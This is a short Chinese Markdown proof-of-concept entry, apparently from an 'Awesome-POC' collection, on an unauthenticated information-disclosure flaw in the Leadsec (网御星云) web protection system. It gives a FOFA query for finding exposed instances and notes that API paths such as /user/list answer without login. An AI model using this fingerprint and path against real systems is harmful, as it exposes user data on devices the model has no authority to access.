Awesome-POC/Web应用漏洞/网御星云 web防护系统 信息泄露漏洞.md

# 网御星云 web防护系统 信息泄露漏洞

## 漏洞描述

网御星云 web防护系统 存在信息泄露漏洞，通过访问特殊的Url获取部分敏感信息

## 漏洞影响

```
网御星云
```

## FOFA

```
title="网页防篡改系统"
```

## 漏洞复现

登录页面如下



![image-20220209200743358](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202092007654.png)



访问



```plain
http://xxx.xxx.xxx.xxx/API/
```



![image-20220209200809080](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202092008160.png)

部分 API请求 不需要登录即可访问获取信息，例如 **/user/list**



![image-20220209200829973](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202092008053.png)